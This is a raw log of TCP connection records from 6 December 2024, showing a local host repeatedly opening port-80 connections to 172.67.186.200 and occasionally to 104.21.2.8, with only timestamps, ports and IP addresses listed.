Dec 6, 2024 03:13:21.510137081 CET	49931	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:21.629781008 CET	80	49931	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:21.858238935 CET	49931	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:21.977957964 CET	80	49931	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:22.596486092 CET	80	49931	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:22.639328003 CET	49931	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:22.859915972 CET	80	49931	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:22.904946089 CET	49931	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:22.980288982 CET	49931	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:22.981168985 CET	49934	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:23.100243092 CET	80	49931	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:23.100305080 CET	49931	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:23.100812912 CET	80	49934	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:23.100887060 CET	49934	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:23.101032972 CET	49934	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:23.221055031 CET	80	49934	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:23.451878071 CET	49934	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:23.571623087 CET	80	49934	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:24.198321104 CET	80	49934	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:24.248720884 CET	49934	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:24.468415022 CET	49934	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:24.468951941 CET	49940	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:24.475007057 CET	80	49934	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:24.475071907 CET	49934	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:24.588409901 CET	80	49934	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:24.588629961 CET	80	49940	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:24.588638067 CET	49934	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:24.588709116 CET	49940	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:24.588857889 CET	49940	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:24.592751026 CET	49941	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:24.708442926 CET	80	49940	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:24.712394953 CET	80	49941	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:24.712481022 CET	49941	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:24.712661982 CET	49941	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:24.833100080 CET	80	49941	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:24.936264038 CET	49940	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:25.056042910 CET	80	49940	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:25.056077957 CET	80	49940	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:25.061328888 CET	49941	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:25.182594061 CET	80	49941	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:25.687683105 CET	80	49940	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:25.733232975 CET	49940	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:25.798698902 CET	80	49941	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:25.842453957 CET	49941	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:25.983552933 CET	80	49940	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:26.030064106 CET	49940	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:26.042028904 CET	80	49941	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:26.092425108 CET	49941	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:26.170257092 CET	49940	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:26.170371056 CET	49941	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:26.171659946 CET	49948	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:26.290292025 CET	80	49940	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:26.290344954 CET	49940	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:26.290775061 CET	80	49941	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:26.290822983 CET	49941	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:26.291327000 CET	80	49948	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:26.291383982 CET	49948	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:26.291549921 CET	49948	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:26.411196947 CET	80	49948	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:26.639564991 CET	49948	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:26.759337902 CET	80	49948	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:27.395282984 CET	80	49948	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:27.436167955 CET	49948	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:27.692084074 CET	80	49948	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:27.733151913 CET	49948	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:27.884040117 CET	80	49948	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:27.884258032 CET	49948	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:28.004317045 CET	80	49948	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:28.004498959 CET	49948	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:28.012456894 CET	49952	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:28.133268118 CET	80	49952	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:28.133343935 CET	49952	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:28.133522034 CET	49952	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:28.253207922 CET	80	49952	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:28.483169079 CET	49952	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:28.603003979 CET	80	49952	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:29.217797995 CET	80	49952	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:29.264271975 CET	49952	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:29.453210115 CET	80	49952	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:29.498837948 CET	49952	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:29.574490070 CET	49952	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:29.575272083 CET	49955	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:29.694493055 CET	80	49952	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:29.694677114 CET	49952	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:29.694912910 CET	80	49955	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:29.694977045 CET	49955	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:29.695091009 CET	49955	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:29.814723015 CET	80	49955	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:30.045945883 CET	49955	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:30.165709019 CET	80	49955	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:30.780194998 CET	80	49955	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:30.826797009 CET	49955	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:30.999821901 CET	49955	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:31.000334978 CET	49961	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:31.051516056 CET	80	49955	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:31.051580906 CET	49955	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:31.119839907 CET	80	49955	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:31.119987965 CET	80	49961	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:31.120049953 CET	49955	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:31.120089054 CET	49961	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:31.120975971 CET	49961	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:31.122163057 CET	49962	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:31.240648031 CET	80	49961	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:31.241851091 CET	80	49962	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:31.245873928 CET	49962	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:31.246064901 CET	49962	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:31.365739107 CET	80	49962	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:31.467526913 CET	49961	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:31.587322950 CET	80	49961	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:31.587346077 CET	80	49961	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:31.592523098 CET	49962	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:31.712392092 CET	80	49962	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:32.210465908 CET	80	49961	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:32.264303923 CET	49961	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:32.331662893 CET	80	49962	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:32.373642921 CET	49962	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:32.485982895 CET	80	49961	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:32.530034065 CET	49961	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:32.627780914 CET	80	49962	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:32.670628071 CET	49962	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:32.747091055 CET	49961	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:32.747169018 CET	49962	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:32.750935078 CET	49968	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:32.867214918 CET	80	49961	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:32.867315054 CET	49961	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:32.867607117 CET	80	49962	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:32.867661953 CET	49962	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:32.870558977 CET	80	49968	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:32.870640039 CET	49968	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:32.876612902 CET	49968	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:32.996371984 CET	80	49968	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:33.233144999 CET	49968	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:33.354144096 CET	80	49968	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:33.961354971 CET	80	49968	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:34.014266014 CET	49968	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:34.208884001 CET	80	49968	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:34.264261961 CET	49968	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:34.322321892 CET	49968	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:34.322962046 CET	49971	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:34.442455053 CET	80	49968	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:34.442524910 CET	49968	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:34.442655087 CET	80	49971	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:34.442719936 CET	49971	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:34.442908049 CET	49971	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:34.562520027 CET	80	49971	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:34.795597076 CET	49971	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:34.916228056 CET	80	49971	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:35.528739929 CET	80	49971	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:35.576760054 CET	49971	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:35.798047066 CET	80	49971	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:35.842417002 CET	49971	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:35.918113947 CET	49971	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:35.919106007 CET	49975	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:36.038078070 CET	80	49971	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:36.038161039 CET	49971	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:36.038774967 CET	80	49975	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:36.038853884 CET	49975	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:36.039033890 CET	49975	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:36.159473896 CET	80	49975	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:36.389338970 CET	49975	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:36.509089947 CET	80	49975	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:37.127295971 CET	80	49975	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:37.170599937 CET	49975	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:37.383707047 CET	80	49975	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:37.436184883 CET	49975	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:37.502326965 CET	49975	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:37.502567053 CET	49981	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:37.514658928 CET	49927	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:37.514720917 CET	49773	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:37.514767885 CET	49825	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:37.517904997 CET	49982	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:37.518078089 CET	49981	80	192.168.2.6	104.21.2.8
Dec 6, 2024 03:13:37.622301102 CET	80	49981	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:37.622354031 CET	49981	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:37.622394085 CET	80	49975	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:37.622442007 CET	49975	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:37.637623072 CET	80	49982	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:37.637700081 CET	80	49981	104.21.2.8	192.168.2.6
Dec 6, 2024 03:13:37.637784004 CET	49981	80	192.168.2.6	104.21.2.8
Dec 6, 2024 03:13:37.637789011 CET	49982	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:37.637887955 CET	49981	80	192.168.2.6	104.21.2.8
Dec 6, 2024 03:13:37.637947083 CET	49982	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:37.758061886 CET	80	49982	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:37.983212948 CET	49982	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:38.102881908 CET	80	49982	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:38.733068943 CET	80	49982	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:38.779983044 CET	49982	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:39.026693106 CET	80	49982	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:39.076792002 CET	49982	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:39.152405024 CET	49982	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:39.153326035 CET	49987	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:39.272444963 CET	80	49982	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:39.272557974 CET	49982	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:39.272972107 CET	80	49987	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:39.273063898 CET	49987	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:39.273261070 CET	49987	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:39.393064976 CET	80	49987	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:39.623833895 CET	49987	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:39.743643045 CET	80	49987	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:40.357671022 CET	80	49987	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:40.404875040 CET	49987	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:40.644319057 CET	80	49987	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:40.686228037 CET	49987	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:40.760243893 CET	49991	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:40.879978895 CET	80	49991	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:40.880151033 CET	49991	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:40.880398989 CET	49991	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:41.000046968 CET	80	49991	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:41.233117104 CET	49991	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:41.352781057 CET	80	49991	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:42.003324032 CET	80	49991	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:42.045531988 CET	49991	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:42.291090012 CET	80	49991	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:42.342374086 CET	49991	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:42.416682005 CET	49991	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:42.417402983 CET	49995	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:42.536745071 CET	80	49991	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:42.536801100 CET	49991	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:42.537070990 CET	80	49995	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:42.537130117 CET	49995	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:42.537362099 CET	49995	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:42.642776012 CET	49995	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:42.644165993 CET	49987	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:42.645603895 CET	49997	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:42.656996965 CET	80	49995	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:42.761961937 CET	49999	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:42.765273094 CET	80	49997	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:42.765341043 CET	49997	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:42.765445948 CET	49997	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:42.804441929 CET	80	49995	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:42.881624937 CET	80	49999	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:42.881939888 CET	49999	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:42.882006884 CET	49999	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:42.885055065 CET	80	49997	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:43.003025055 CET	80	49999	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:43.123959064 CET	49997	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:43.233275890 CET	49999	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:43.243861914 CET	80	49997	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:43.243884087 CET	80	49997	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:43.353049040 CET	80	49999	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:43.468790054 CET	80	49995	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:43.468841076 CET	49995	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:43.871056080 CET	80	49997	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:43.920502901 CET	49997	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:43.966465950 CET	80	49999	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:44.014240026 CET	49999	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:44.151262999 CET	80	49997	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:44.201869965 CET	49997	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:44.238538027 CET	80	49999	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:44.279903889 CET	49999	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:44.354667902 CET	49997	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:44.354877949 CET	49999	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:44.355489969 CET	50003	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:44.474706888 CET	80	49997	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:44.474775076 CET	49997	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:44.475203991 CET	80	49999	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:44.475235939 CET	80	50003	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:44.475272894 CET	49999	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:44.475337029 CET	50003	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:44.475464106 CET	50003	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:44.595197916 CET	80	50003	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:44.826829910 CET	50003	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:44.946652889 CET	80	50003	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:45.569078922 CET	80	50003	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:45.623650074 CET	50003	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:45.808435917 CET	80	50003	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:45.858006001 CET	50003	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:45.932086945 CET	50009	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:46.051805019 CET	80	50009	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:46.051898956 CET	50009	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:46.052083015 CET	50009	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:46.171695948 CET	80	50009	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:46.407844067 CET	50009	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:46.527645111 CET	80	50009	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:47.141649961 CET	80	50009	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:47.187911987 CET	50009	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:47.408797026 CET	80	50009	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:47.451724052 CET	50009	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:47.535228014 CET	50009	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:47.536220074 CET	50013	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:47.655240059 CET	80	50009	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:47.655293941 CET	50009	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:47.655899048 CET	80	50013	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:47.655961990 CET	50013	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:47.656213999 CET	50013	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:47.775840044 CET	80	50013	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:48.017793894 CET	50013	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:48.137819052 CET	80	50013	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:48.740933895 CET	80	50013	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:48.795480013 CET	50013	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:48.989597082 CET	80	50013	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:49.029866934 CET	50013	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:49.159796953 CET	50017	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:49.181590080 CET	80	50013	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:49.182159901 CET	50017	80	192.168.2.6	104.21.2.8
Dec 6, 2024 03:13:49.233012915 CET	50013	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:49.279648066 CET	80	50017	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:49.279692888 CET	50017	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:49.301817894 CET	80	50017	104.21.2.8	192.168.2.6
Dec 6, 2024 03:13:49.301873922 CET	50017	80	192.168.2.6	104.21.2.8
Dec 6, 2024 03:13:49.301970005 CET	50017	80	192.168.2.6	104.21.2.8
Dec 6, 2024 03:13:49.312429905 CET	50013	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:49.313488960 CET	50019	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:49.432521105 CET	80	50013	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:49.432586908 CET	50013	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:49.433100939 CET	80	50019	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:49.433178902 CET	50019	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:49.433383942 CET	50019	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:49.553049088 CET	80	50019	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:49.779990911 CET	50019	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:49.899836063 CET	80	50019	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:50.520114899 CET	80	50019	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:50.579833984 CET	50019	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:50.791306019 CET	80	50019	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:50.842717886 CET	50019	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:50.924137115 CET	50023	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:51.043989897 CET	80	50023	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:51.044068098 CET	50023	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:51.044312954 CET	50023	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:51.164009094 CET	80	50023	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:51.389288902 CET	50023	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:51.509053946 CET	80	50023	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:52.129776001 CET	80	50023	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:52.186108112 CET	50023	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:52.386081934 CET	80	50023	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:52.437772036 CET	50023	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:52.519548893 CET	50023	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:52.520627022 CET	50029	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:52.639831066 CET	80	50023	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:52.640340090 CET	80	50029	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:52.640459061 CET	50023	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:52.640460968 CET	50029	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:52.640714884 CET	50029	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:52.760381937 CET	80	50029	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:52.999010086 CET	50029	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:53.119178057 CET	80	50029	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:53.733681917 CET	80	50029	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:53.779823065 CET	50029	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:53.969609022 CET	80	50029	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:53.970428944 CET	50029	80	192.168.2.6	172.67.186.200
